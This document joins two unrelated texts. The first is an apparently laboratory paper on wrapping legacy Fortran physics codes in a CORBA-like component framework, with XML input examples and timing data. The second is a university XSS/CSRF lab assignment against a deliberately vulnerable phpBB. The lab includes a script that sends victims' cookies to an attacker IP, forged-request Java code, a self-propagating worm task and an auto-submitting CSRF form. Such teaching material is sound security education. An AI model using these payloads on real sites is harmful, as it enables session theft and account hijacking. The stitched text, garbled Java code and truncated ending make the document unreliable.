In order to solve the language, complexity, and community-evolution issues, a component framework must be adopted that allows multi-language integration and facilitates a modular decomposition and integration of large and complex codes. An industry-standard framework that addresses these two issues exists in the Common Object Request Broker Architecture (CORBA). Both an overview and detailed information can be found at the CORBA web site at [http://www.corba.org](http://www.corba.org). The CORBA framework has a standard Interface Definition Language (IDL) for expressing public application interfaces that permit decomposition of large codes. This mechanism also mitigates the language integration problem. CORBA typically operates in a networked environment. This does not accommodate the performance demands of physics modeling codes.
Sufficient performance can be achieved by using run-time loading of dynamic modules as an implementation of CORBA objects while retaining the benefits of the CORBA framework. This framework offers the desired multi-language interoperability, facilitates evolution of the code, and retains the existing scientific value of the codes.

**Additional Component Architecture Benefits**

With a modular and dynamic framework in place, new user interface technology is possible. This includes adoption of newer input data specification languages such as the Extensible Markup Language (XML) and newer output representations, like Java components, that make these codes more approachable by a broader user audience in a web-based setting. The program structures that process inputs are generally ad hoc, dispersed throughout the code, and tightly coupled to the low-level data abstractions. It is difficult to understand and extend input processing in these codes. An architectural approach that localizes and contains input processing allows us to extend and expand the types of data processed. XML is particularly appealing because of the self-documenting structure that can be achieved when using this kind of language to describe the various materials used in physics modeling. XML processing modules for the various types of data used in the modeling programs could then be used dynamically by the core modeling code when and where necessary.

Historically, inputs were often limited to 80-column card images, with ad hoc comment conventions; special characters for field delimiters, continuations, and input terminators; and multiple special-case overloading interpreted by matching ad hoc code. As an example, a material specification might appear as:

```
m1 13027.40c 1
m2 26000.40c 1
```

Without referring to a manual, how does one know or remember that 13027.40c is the concatenation of atomic number, atomic mass, a separator, a library identifier, and a data class specification? XML describes a class of data objects and partially describes the behavior of computer programs which process them. A structured, self-documenting material specification in XML might be:

```xml
<material>
  <num>1</num>
  <atomnum>13</atomnum>
  <atommass>027</atommass>
  <libraryid>40</libraryid>
  <dataclass>c</dataclass>
  <atomfraction>1</atomfraction>
</material>
```

Or, if defined as an element with attributes:

```xml
<material num="1" atomnum="13" atommass="027" libraryid="40"
          dataclass="c" atomfraction="1"/>
```

While this looks formidable at first glance, keep in mind that these kinds of entries can now be the result of choosing items from graphical displays and do not have to be hand-written. Existing input files can be translated to XML syntax by scripts written in pattern-matching languages.

There are utilities to render graphical representations of the data used in the physics modeling codes. Often these are hand-crafted two- or three-dimensional plotting packages that are tightly coupled to the low-level data abstractions present in the codes. A component approach would introduce a more independent and reusable visual presentation capability with its own attributes, physical layout, and containment. With input and output handling mechanisms such as the ones just described, the physics modeling codes can be deployed to a broad audience in a network- and browser-based environment as well as through a more traditional graphical user interface.

**Assumptions and Conditions**

Our suggested CORBA-based component approach is based on several assumptions.
We believe that optimizations at the Object Request Broker (ORB) level that recognize shared address space interactions make these types of solutions reasonable. When both the client and server appear in the same ORB address space, the need for marshalling and transmitting, then receiving and demarshalling, the parameters exchanged between the (client) stub and (server) skeleton is eliminated. A simplified look-up mechanism similar to what occurs for dynamic linking can be used. This optimized approach can be found, for example, in the ORBit object request broker. ORBit is a CORBA 2.2-compliant Object Request Broker (ORB) that is developed and released as open source software under the GNU General Public License and GNU Lesser General Public License (GPL/LGPL) and is supported by Red Hat and Ximian as part of the GNOME project. ORBit is engineered for the desktop workstation environment, with a focus on performance, low resource usage, and security.

A language binding defines how to use the IDL operations in a programming language. The current content of the CORBA web site indicates that there is no IDL / Language Mapping Specification for FORTRAN. We assume that a CORBA language binding for FORTRAN can be developed based upon the Language Mapping Specification for C. This is the trickiest part of implementing our component-based solution. Until a formal language mapping is available for FORTRAN, we must manually write and maintain the code that an IDL compiler would generate.

**Preservation of Existing Value**

While the modernization of these scientific codes is underway, we must demonstrate that we have not impacted or removed any existing physics modeling capability. This assurance comes from the use of an automated regression testing mechanism that is run on a nightly basis. Our current regression test mechanism encompasses a dozen different networked computer hosts (referred to as our "test farm") and exercises 10 different combinations of hardware, operating systems, and compilers. It also exercises both the static and dynamic construction and execution techniques. A specially constructed set of roughly 40 to 50 different test problems is run against the constructed executable code. These tests range from code coverage tests that exercise a large percentage of the code through physics model validation tests that exercise specific code features. A set of expected results is compared to the set of computed results. When the answers are a close enough match, we declare that the tests "track" the existing expected answers. Round-off errors on various platforms using different math library versions sometimes prevent exact matches.

The testing proceeds as follows:

**Step 1.** Each night at a designated time, an operating system command activates the regression test driver program. Using a special testing account, the regression test driver program first assures that the most recent version of the code from the Concurrent Versions System (CVS) repository is placed into a common shared file partition on one of the test farm machines. This common file partition is exported on the network so it can be accessed by all of the test farm host computers. This assures that the same source code base is used on each of the various hardware platforms.
**Step 2.** The regression test driver program then performs a secure shell login to each of the test farm machines, and runs a shell script to "configure" the source code for the particular hardware/operating system/Fortran compiler/C compiler combination being tested. After a successful configure, the shell script "makes" the executable program and performs a "make tests" command to activate the tests. These special "make" commands are generated output of the configure step.

**Step 3.** All the generated output from the shell script execution is captured on each machine that is tested. The following morning, the output on each platform is gathered and examined.

Future development of this regression test capability includes automated checking of all of the generated output on each platform and generation of a web page that developers can check.

**Analysis**

We are in the early stages of our modernization effort. We have demonstrated that CORBA-like in-memory optimizations work and are usable. Existing ORBs such as ORBit already implement and use this optimization. For our work at the Laboratory, as a first step we have produced an independent implementation of a framework that dynamically loads modules and uses an IDL syntax and compiler to generate non-CORBA stub and skeleton code for efficient in-process communication. This structure allows us to experiment with decomposition strategies for large scientific codes while retaining compatibility with CORBA. The correct decomposition of portions of the code that represent reasonable approximations of architectural physics components must be determined, but we have the necessary structure to begin experimentation. Interfaces for appropriate components must be identified and developed. While the component structure is being discovered, the existing capability in the code must not be compromised; this is being assured with our automated regression test mechanism.

**Performance and/or Complexity Data**

We are running the code both in its monolithic form and within the new dynamically linked framework. Our timing statistics for execution of the regression tests are shown in the accompanying Timing Table and range from little difference on the newer machines to a larger difference on older machines. However, execution speed alone is not the only metric to be considered. We believe the increased access to code capability and ease of extension will guarantee its continued use and further development. We believe "pluggable" physics modules can be attained using component architectures.

**Result of the Work**

The result of this work is not intended for commercial production. It is being undertaken to protect an investment.
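For a concrete picture of the nightly procedure described in Steps 1 through 3 above, the following is a minimal sketch of what such a driver script might look like. The host names, paths, and CVS module name are illustrative assumptions, not our actual test farm configuration.

```bash
#!/bin/sh
# Minimal sketch of a nightly regression driver (Steps 1-3 above).
# Host names, paths, and the CVS module name are hypothetical.

SHARED=/testfarm/shared            # partition exported to all test hosts
HOSTS="linux-i686 linux-sparc sunos-sun4m osf1-alpha hpux-735"

# Step 1: place the latest source from CVS into the shared partition
# (assumes CVSROOT is already set in the testing account's environment).
cd "$SHARED" && cvs -q checkout physics_code

# Step 2: configure, build, and run the tests on every platform,
# capturing all generated output per host.
mkdir -p "$SHARED/logs"
for host in $HOSTS; do
  ssh "$host" "cd $SHARED/physics_code && ./configure && make && make tests" \
      > "$SHARED/logs/$host.log" 2>&1
done

# Step 3: the logs in $SHARED/logs are gathered and examined the next morning.
```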
**Timing Table**

<table>
<thead>
<tr>
<th>Platform &amp; compilers</th>
<th>Construction Method</th>
<th>Make Tests (seconds)</th>
<th>% Difference vs. Static</th>
</tr>
</thead>
<tbody>
<tr>
<td>Linux i686 pgf77 gcc</td>
<td>static</td>
<td>1459.64</td>
<td></td>
</tr>
<tr>
<td>Linux i686 pgf77 gcc</td>
<td>shared</td>
<td>1585.30</td>
<td></td>
</tr>
<tr>
<td><strong>Difference</strong></td>
<td></td>
<td><strong>125.66</strong></td>
<td><strong>9 % slower</strong></td>
</tr>
<tr>
<td>Linux sparc g77 gcc</td>
<td>static</td>
<td>33092.21</td>
<td></td>
</tr>
<tr>
<td>Linux sparc g77 gcc</td>
<td>shared</td>
<td>36455.07</td>
<td></td>
</tr>
<tr>
<td><strong>Difference</strong></td>
<td></td>
<td><strong>3362.86</strong></td>
<td><strong>10 % slower</strong></td>
</tr>
<tr>
<td>SunOS sun4m f77 cc</td>
<td>static</td>
<td>66864.88</td>
<td></td>
</tr>
<tr>
<td>SunOS sun4m f77 cc</td>
<td>shared</td>
<td>86557.35</td>
<td></td>
</tr>
<tr>
<td><strong>Difference</strong></td>
<td></td>
<td><strong>19692.47</strong></td>
<td><strong>29 % slower</strong></td>
</tr>
<tr>
<td>OSF1 (Tru64) alpha f77 cc</td>
<td>static</td>
<td>1267.20</td>
<td></td>
</tr>
<tr>
<td>OSF1 (Tru64) alpha f77 cc</td>
<td>shared</td>
<td>1295.60</td>
<td></td>
</tr>
<tr>
<td><strong>Difference</strong></td>
<td></td>
<td><strong>28.40</strong></td>
<td><strong>2 % slower</strong></td>
</tr>
<tr>
<td>HP-UX 9000/735 fort77 cc</td>
<td>static</td>
<td>6964.80</td>
<td></td>
</tr>
<tr>
<td>HP-UX 9000/735 fort77 cc</td>
<td>shared</td>
<td>7888.80</td>
<td></td>
</tr>
<tr>
<td><strong>Difference</strong></td>
<td></td>
<td><strong>924.00</strong></td>
<td><strong>13 % slower</strong></td>
</tr>
</tbody>
</table>
{"Source-Url": "https://digital.library.unt.edu/ark:/67531/metadc723405/m2/1/high_res_d/789478.pdf", "len_cl100k_base": 5026, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 19649, "total-output-tokens": 5494, "length": "2e12", "weborganizer": {"__label__adult": 0.0003216266632080078, "__label__art_design": 0.00036978721618652344, "__label__crime_law": 0.00028061866760253906, "__label__education_jobs": 0.0005731582641601562, "__label__entertainment": 8.493661880493164e-05, "__label__fashion_beauty": 0.0001481771469116211, "__label__finance_business": 0.0002639293670654297, "__label__food_dining": 0.00034165382385253906, "__label__games": 0.0004546642303466797, "__label__hardware": 0.001987457275390625, "__label__health": 0.00041103363037109375, "__label__history": 0.00034165382385253906, "__label__home_hobbies": 0.00010532140731811523, "__label__industrial": 0.0007152557373046875, "__label__literature": 0.00020194053649902344, "__label__politics": 0.00021564960479736328, "__label__religion": 0.0004863739013671875, "__label__science_tech": 0.07965087890625, "__label__social_life": 8.970499038696289e-05, "__label__software": 0.01041412353515625, "__label__software_dev": 0.9013671875, "__label__sports_fitness": 0.00035858154296875, "__label__transportation": 0.0006728172302246094, "__label__travel": 0.0002181529998779297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25649, 0.02142]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25649, 0.75798]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25649, 0.91291]], "google_gemma-3-12b-it_contains_pii": [[0, 2807, false], [2807, 5550, null], [5550, 8447, null], [8447, 11067, null], [11067, 13992, null], [13992, 16617, null], [16617, 19217, null], [19217, 22264, null], [22264, 24106, null], [24106, 25649, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2807, true], [2807, 5550, null], [5550, 8447, null], [8447, 11067, null], [11067, 13992, null], [13992, 16617, null], [16617, 19217, null], [19217, 22264, null], [22264, 24106, null], [24106, 25649, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25649, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25649, null]], "pdf_page_numbers": [[0, 2807, 1], [2807, 5550, 2], [5550, 8447, 3], [8447, 11067, 4], [11067, 13992, 5], [13992, 16617, 6], [16617, 19217, 7], [19217, 22264, 8], [22264, 24106, 9], [24106, 25649, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25649, 0.09189]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
5a45fd4be78955770a7d73edf08528ce32c46497
1 Overview

Cross-site scripting (XSS) and cross-site request forgery (CSRF or XSRF) are two types of vulnerabilities commonly found in web applications. These vulnerabilities make it possible for attackers to inject malicious code (e.g., JavaScript programs) into victims' web browsers, steal their credentials, or perform actions without even having a victim's credentials. The access control policies employed by browsers to protect a user's credentials can often be bypassed by exploiting XSS or CSRF vulnerabilities. Vulnerabilities of this kind can potentially lead to large-scale attacks.

2 XSS Attacks

To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web-based message board using phpBB. We modified the software to introduce an XSS vulnerability in this message board; this vulnerability allows users to post an arbitrary message to the board, including JavaScript programs. You will need to exploit this vulnerability by posting some malicious messages to the message board. Users who view these malicious messages will become victims. The attacker's goal is to post forged messages for the victims.

2.1 Project Environment

For this part of the project, we will need three things: (1) the Firefox web browser, (2) the apache web server, and (3) the phpBB message board web application. For the browser, we will use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses. The pre-built Ubuntu VM image provided to you already has Firefox installed with the required extensions.

The apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands:

```bash
% sudo apache2ctl start
```

or

```bash
% sudo service apache2 start
```

The phpBB web application is already set up in the pre-built Ubuntu VM image as well. We have also created several user accounts in the phpBB application. User information can be obtained by selecting the "Memberlist" link on the front page. The password for each user is the same as his or her user name. You can access the phpBB server using the following URL (the apache server needs to be started first):

```
http://www.xsslabphpbb.com
```

This URL is only accessible from inside of the virtual machine, because we have modified the `/etc/hosts` file to map the domain name (`www.xsslabphpbb.com`) to the virtual machine's local IP address (127.0.0.1). You may map any domain name to a particular IP address using the `/etc/hosts` file. For example, you can map `http://www.example.com` to the local IP address by appending the following entry to the `/etc/hosts` file:

```
127.0.0.1 www.example.com
```

In the pre-built VM image, we use the same apache web server to host several different URLs (some URLs are used for other projects). It is configured to map each of the URLs to a particular directory under `/var/www/`. For example, the server-side code for the `http://www.xsslabphpbb.com` URL is stored in the following directory:

```
/var/www/XSS/XSSLabPhpbb/
```

2.2 XSS Tasks

2.2.1 Task 1.1: Posting a Malicious Message to Display an Alert Window

The objective of this task is to post a malicious message that contains JavaScript to display an alert window. The JavaScript should be provided along with the user comments in the message.
The following JavaScript will display an alert window:

```html
<script>alert('XSS');</script>
```

If you post this JavaScript along with your comments in the message board, then any user who views this comment will see the alert window.

2.2.2 Task 1.2: Posting a Malicious Message to Display Cookies

The objective of this task is to post a malicious message on the message board containing JavaScript code, such that whenever a user views this message, the user's cookies will be printed out. For instance, consider the following message that contains JavaScript code:

```html
<script>alert(document.cookie);</script>
Hello Everyone,
Welcome to this message board.
```

When a user views this message post, he/she will see a pop-up message box that displays the user's cookie.

2.2.3 Task 1.3: Stealing Cookies from a Victim's Machine

In the previous task, the malicious JavaScript code can print out a user's cookie; in this task, the attacker wants the JavaScript code to send the cookies to himself/herself. To achieve this, the malicious JavaScript code can send a HTTP request to the attacker with the cookies appended to the request. We can do this by having the malicious JavaScript insert an `<img>` tag with `src` set to a URL under the attacker's control. When the JavaScript inserts the `<img>` tag, the browser tries to load the image from that URL and in the process ends up sending a HTTP GET request to the attacker's website. The JavaScript given below sends the cookies to port 5555 on the attacker's machine. On that port, the attacker runs a TCP server that simply prints out the requests it receives. The TCP server program will be given to you.

```html
Hello Folks,
<script>document.write('<img src=http://attacker_IP_address:5555?c='
+ document.cookie + '>');
</script>
This script is to test XSS. Thanks.
```

2.2.4 Task 1.4: Impersonating the Victim using the Stolen Cookies

After stealing the victim's cookies, the attacker can do whatever the victim can do in the phpBB web app, including posting a new message in the victim's name, deleting the victim's posts, etc. In this task, we will write a program to forge a message post on behalf of the victim.

To forge a message post, we should first analyze how phpBB works in terms of posting messages. More specifically, our goal is to figure out what is sent to the server when a user posts a message. Firefox's LiveHTTPHeaders extension can help us; it displays the contents of any HTTP request message sent from the browser. From the contents, we can identify all of the parameters of the message. A screen shot of LiveHTTPHeaders is given in Figure 2. It is already installed in the pre-built Ubuntu VM image.

Once you understand what the HTTP request for message posting looks like, we can write a Java program to send out the same HTTP request. The phpBB server cannot distinguish whether the request is sent out by the user's browser or by the attacker's Java program, as long as we set all the parameters in the HTTP request correctly. To simplify your task, we provide you with a sample Java program that does the following:

1. Opens a connection to the web server.
2. Sets the necessary HTTP header information.
3. Sends the request to the web server.
4. Gets the response from the web server.

```java
import java.io.*;
import java.net.*;

public class HTTPSimpleForge {
    public static void main(String[] args) throws IOException {
        try {
            int responseCode;
            InputStream responseIn = null;
            // URL to be forged.
URL url = new URL("http://www.xsslabphpbb.com/profile.php"); // URLConnection instance is created to further parameterize a // resource request past what the state members of URL instance // can represent. URLConnection urlConn = url.openConnection(); // HttpURLConnection a subclass of URLConnection is returned by // url.openConnection() since the url is an http request. if (urlConn instanceof HttpURLConnection) { urlConn.setConnectTimeout(60000); urlConn.setReadTimeout(90000); } // addRequestProperty method is used to add HTTP Header Information. // Here we add User-Agent HTTP header to the forged HTTP packet. urlConn.addRequestProperty("User-agent","Sun JDK 1.6"); // HTTP Post Data which includes the information to be sent to the server. String data="username=admin&email=admin%40seed.com"; ``` // DoOutput flag of URL Connection should be set to true // to send HTTP POST message. urlConn.setDoOutput(true); // OutputStreamWriter is used to write the HTTP POST data // to the url connection. OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream()); wr.write(data); wrfush(); // Again: HttpURLConnection a subclass of URLConnection is returned by // url.openConnection() since the url is an http request. if (urlConn instanceof HttpURLConnection) { HttpURLConnection httpConn = (HttpURLConnection) urlConn; // Contacts the web server and gets the status code from // HTTP Response message. responseCode = httpConn.getResponseCode(); System.out.println("Response Code = " + responseCode); // HTTP status code HTTP_OK means the response was // received sucessfully. if (responseCode == HttpURLConnection.HTTP_OK) { // Get the input stream from url connection object. responseIn = urlConn.getInputStream(); // Create an instance for BufferedReader // to read the response line by line. BufferedReader buf_in = new BufferedReader( new InputStreamReader(responseIn)); String inputLine; while((inputLine = buf_in.readLine())!=null) { System.out.println(inputLine); } } } } catch (MalformedURLException e) { e.printStackTrace(); } If you have trouble understanding the above program, we suggest you to read the following: - JDK 6 Documentation: http://java.sun.com/javase/6/docs/api/ **Limitation:** The forged message post should be generated from the same virtual machine i.e., the victim (user connected to the web forum) and the attacker (one who generates a forged message post) should be on the same machine because phpBB uses both the source IP address and cookie for session management. If the attacker generates the forged message post from a different machine, the IP address of the forged packet and the victim’s IP address would differ. Hence, the forged message post would be rejected by the phpBB server despite the fact that the forged message carries the correct cookie information. 2.2.5 Task 1.5: Writing an XSS Worm In the previous task, we have learned how to steal the cookies from the victim and then forge HTTP requests using the stolen cookies. In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. JavaScript code that can achieve this is called a cross-site scripting worm. For this web application, the worm program should do the following: 1. Retrieve the session ID of the user using JavaScript. 2. Forge a HTTP post request to post a message using the session ID. There are two common types of HTTP requests: one is an HTTP GET request, and the other is an HTTP POST request. 
These two types of HTTP requests differ in how they send the contents of the request to the server. In phpBB, the request for posting a message uses HTTP POST requests. We can use the XMLHttpRequest object to send HTTP GET and POST requests for web applications. XMLHttpRequest can only send HTTP requests back to the originating server, not to other computers, because browser same-origin policies are strictly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP POST request back to the phpBB server. To learn how to use XMLHttpRequest, you can study the cited documents [1,2]. If you are not familiar with JavaScript programming, we suggest that you read [3] to learn some basic JavaScript functions. You will have to use some of these functions.

You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. It is already installed in our pre-built Ubuntu VM image.

**Code Skeleton.** We provide a skeleton of the JavaScript code that you need to write. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to the phpBB message board, you need to remove all the comments, extra spaces, and new-line characters.

```javascript
<script>
var Ajax=null;
// Construct the header information for the HTTP request.
Ajax=new XMLHttpRequest();
Ajax.open("POST","http://www.xsslabphpbb.com/posting.php",true);
Ajax.setRequestHeader("Host","www.xsslabphpbb.com");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders. All we need to fill in is subject, message, and sid.
var content="subject=" + "XSSWorm" + "..."; // You need to fill in the details.
// Send the HTTP POST request.
Ajax.send(content);
</script>
```

To make our worm work, we should pay attention to how the session ID (sid) information is used by phpBB. From the output of the LiveHTTPHeaders extension, we can notice that sid appears twice in the message-posting request. One appearance is in the cookie section (where it is called phpbb2mysql_sid); therefore, the HTTP POST request sent out by XMLHttpRequest must also include the cookie. We already did this for you in the above skeleton code. If we look carefully at the LiveHTTPHeaders output, we can see that the same session ID also appears in the line that starts with "subject=". The phpBB server uses the session ID here to prevent another type of attack (i.e., the cross-site request forgery attack discussed in the second half of this assignment). In our forged message-posting request, we also need to add this session ID information; the value of this session ID is exactly the same as that in phpbb2mysql_sid. Without this session ID in the request, the request will be discarded by the server. In order to retrieve the sid information from the cookie, you may need to learn some string operations in JavaScript. You should study the cited tutorial [4].

2.2.6 Task 1.6: Writing a Self-Propagating XSS Worm (Bonus)

For extra credit: the worm built in the previous task only forges a message on behalf of the victims; it does not propagate itself. Therefore, technically speaking, it is not a worm.
To be able to propagate itself, the forged message should also include a worm, so that whenever somebody clicks on the forged message, a new forged message that carries the same worm will be created. This way, the worm can propagate. The more people click on the forged messages, the faster the worm can propagate. In this task, you need to expand what you did in Task 1.5 and add a copy of the worm to the body of the forged message.

3 CSRF Attack

In this part of the project, you will be attacking a web-based message board system using CSRF attacks. You can access the phpBB server (for this part of the project) using the following URLs (again, the Apache server needs to be started first):

<table> <thead> <tr> <th>URL</th> <th>Description</th> <th>Directory</th> </tr> </thead> <tbody> <tr> <td><a href="http://www.csrflabattacker.com">http://www.csrflabattacker.com</a></td> <td>Attacker web site</td> <td>/var/www/CSRF/Attacker/</td> </tr> <tr> <td><a href="http://www.originalphpbb.com">http://www.originalphpbb.com</a></td> <td>Original phpBB</td> <td>/var/www/OriginalPhpbb/</td> </tr> </tbody> </table>

3.1 Background of CSRF Attacks

A CSRF attack involves a victim user, a trusted site, and a malicious site. The victim user holds an active session with the trusted site and simultaneously visits the malicious site. The malicious site injects an HTTP request for the trusted site into the victim user's session, compromising its integrity. The attack involves the following sequence of steps:

1. The victim user logs into the trusted site using her username and password, and thus creates a new session.
2. The trusted site stores the session identifier for the session in a cookie in the victim user's web browser.
3. The victim user visits a malicious site.
4. The malicious site's web page sends a request to the trusted site from the victim user's browser.
5. The web browser automatically attaches the session cookie to the malicious request because it is targeted for the trusted site.
6. The trusted site processes the malicious request forged by the attacker web site.

The malicious site can forge both HTTP GET and POST requests for the trusted site. Some HTML tags such as `img`, `iframe`, `frame`, and `form` have no restrictions on the URL that can be used in their attributes. The HTML `img`, `iframe`, and `frame` tags can be used for forging GET requests. The HTML `form` tag can be used for forging POST requests. The tasks in this part of the project involve forging both GET and POST requests for a target application.

### 3.2 CSRF Tasks

For the project tasks, you will use two web sites that are set up locally in the virtual machine. The first web site is the vulnerable phpBB accessible at `www.csrflabphpbb.com` inside the virtual machine. The second web site is an attacker web site that you will set up to attack the trusted site. The attacker web site is accessible via `www.csrflabattacker.com` inside the virtual machine.

#### 3.2.1 Task 2.1: Attack using HTTP GET request

In the vulnerable phpBB, a new topic can be posted using a GET request targeted at the following URL:

```
http://www.csrflabphpbb.com/posting.php?mode=newtopic&f=1
```

The URL has two parameters, `mode=newtopic` and `f=1`. These parameters tell the server-side script `posting.php` that the request is intended to post a new message to forum 1. To forge a request to post a new topic to the forum, the malicious site can use this URL in an HTML `img` tag inside a web page.
```
<html>
<body>
<!-- Illustrative completion of the skeleton: the img tag carries the posting URL described above. -->
<img src="http://www.csrflabphpbb.com/posting.php?mode=newtopic&f=1" />
</body>
</html>
```

Whenever the victim user visits the crafted web page on the malicious site, the web browser automatically issues an HTTP GET request for the URL contained in the `img` tag. Because the web browser automatically attaches the session cookie to the request, the trusted site cannot distinguish the malicious request from a genuine request and ends up processing it, compromising the victim user's session integrity.

For this task, you will observe the structure of a different request for posting a new message in the vulnerable phpBB application and then try to forge it from the malicious site. You can use the `LiveHTTPHeaders` extension to observe the contents of the HTTP requests. You will see something similar to the following:

```
addbbcode18=%2344444444&addbbcode20=0&helpbox=Quote+text+%3A+%5Bquote%5Dtext%5B%2Fquote%5D++%28alt%2Bq%29&message=This+is+
my+message&topictype=0&poll_title=&add_poll_option_text=&
poll_length=&mode=newtopic&f=1&post=Submit
```

Observe the request structure for posting a new message to the forum and then use this to forge a new request to the application. When the victim user visits the malicious web page, a malicious request for posting a message should be injected into the victim's active session with phpBB.

3.2.2 Task 2.2: Attack using HTTP POST request

HTTP GET requests are typically used for requests that do not involve any side effects, i.e., they simply retrieve (but do not modify) server data. The original phpBB does not use GET requests for posting a new message to the forum. We modified the source code of phpBB so that new messages can be posted using GET requests to facilitate Task 2.1.

In this task, you will forge a POST request that modifies the profile information in phpBB (www.csrflabphpbb.com). In an HTTP POST request, the parameters of the request are provided in the HTTP message body. Forging an HTTP POST request is slightly more difficult. An HTTP POST message for the trusted site can be generated using a `form` tag on the malicious site. Furthermore, we need a JavaScript program to automatically submit the form.

The server-side script profile.php allows users to modify their profile information using a POST request. You can observe the structure of the request, i.e., the parameters of the request, by making some modifications to the profile and monitoring the request using LiveHTTPHeaders. You may expect to see something similar to the following:

```
Content-Type: application/x-www-form-urlencoded
Content-Length: 473

username=admin&email=admin%40seed.com&cur_password=&new_password=&password_confirm=&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=I+am+good+guy&viewemail=1&hideonline=0&notifyreply=0&notifyipm=1&attachsig=0&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=d+M+Y+h%3Ai+a&mode=editprofile&agreed=true&coppa=0&user_id=2&current_email=admin%40seed.com&submit=Submit
```

Now, using the information you gathered from observing the request, you can construct a web page that sends the forged request. To help you write a JavaScript program that sends an HTTP POST request, we provide sample code in Figure 1. This code can also be downloaded from the course website. You can use this sample code to construct your malicious web site for the CSRF attacks.

3.2.3 Task 2.3: Understanding phpBB's Countermeasures

phpBB has implemented some countermeasures to defend against CSRF attacks.
To allow the attacks in Task 2.1 to work, we had to modify the phpBB code to introduce the vulnerability. Originally, posting.php only accepts POST requests, not GET requests. However, from Task 2.2, we know that changing GET to POST does not prevent CSRF attacks; it simply makes the attacks a little more difficult. phpBB adopts another mechanism to counter CSRF attacks. It includes the following information in the body of the request:

```
sid=b349b781ecbb2268c4caf77f530c55ac
```

This sid value is exactly the same as phpbb2mysql_sid in the cookie. The script posting.php checks whether this sid value is the same as the one in the cookie. If not, the request will fail. In this task, you need to use the original phpBB forum accessible at http://www.originalphpbb.com, try the attacks again, and describe your observations. Can you bypass the countermeasures? If not, please describe why.

3.2.4 Task 2.4: Critiquing Some Countermeasures for CSRF

There are several simple countermeasures suggested for CSRF:

1. Web applications may use a secret-token validation technique such as the one that phpBB uses.
2. Web applications may attempt to verify the origin page of a request using the Referer header.

In this task, you will discuss these countermeasures and provide a critique of their effectiveness. The sample code referenced in Task 2.2 is shown in Figure 1.

```html
<html><body><h1>This page sends a HTTP POST request onload.</h1><script>
function post(url, fields) {
  // Create a <form> element.
  var p = document.createElement('form');
  // Construct the form.
  p.action = url;
  p.innerHTML = fields;
  p.target = '_self';
  p.method = 'post';
  // Append the form to the current page.
  document.body.appendChild(p);
  // Submit the form.
  p.submit();
}

function csrf_hack() {
  var fields = "";
  // You should replace the following 3 lines with your form parameters.
  fields += "<input type='hidden' name='username' value='Alice'>";
  fields += "<input type='hidden' name='transfer' value='10000'>";
  fields += "<input type='hidden' name='to' value='Bot'>";
  // Note: don't add an element named 'submit' here;
  // otherwise, p.submit() will not be invoked.
  // 'Submit' will work.
  post('http://www.example.com', fields);
}

window.onload = function(){ csrf_hack(); }
</script></body></html>
```

Figure 1: Sample JavaScript program

4 Deliverables, Deadline, and Other Information

This project is due on April 14th by 11:59 AM (i.e., before noon). Please send the TA a detailed report documenting your experiences in completing the project tasks. Your report should include your observations, answers to any questions asked by the specifications, source code you wrote or modified for the project, screenshots, and anything else that will assist us in evaluating your accomplishments. A good report is one that is insightful, well organized, and well written.

5 Version History

v 0.91 (4/5/2010) – The current version of this document. I have updated the Deliverables section with more details. I have also fixed some typographical errors and ambiguities.

v 0.9 (4/1/2010) – The original version of this document.

6 Attribution

These project specifications are based on a document written by Wenliang Du. What follows is his original copyright notice:

Copyright © 2006 - 2010 Wenliang Du, Syracuse University. The development of this document is funded by the National Science Foundation's Course, Curriculum, and Laboratory Improvement (CCLI) program under Award Nos. 0618680 and 0231122.
Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. A copy of the license can be found at http://www.gnu.org/licenses/fdl.html.

References

[1] AJAX for n00bs. Available at the following URL: http://www.hunlock.com/blogs/AJAX_for_n00bs.
[2] AJAX POST-It Notes. Available at the following URL:
[3] Essential Javascript – A Javascript Tutorial. Available at the following URL:
[4] The Complete Javascript Strings Reference. Available at the following URL:

```
http://www.xsslabphpbb.com/posting.php

POST /posting.php HTTP/1.1
Host: www.xsslabphpbb.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686;
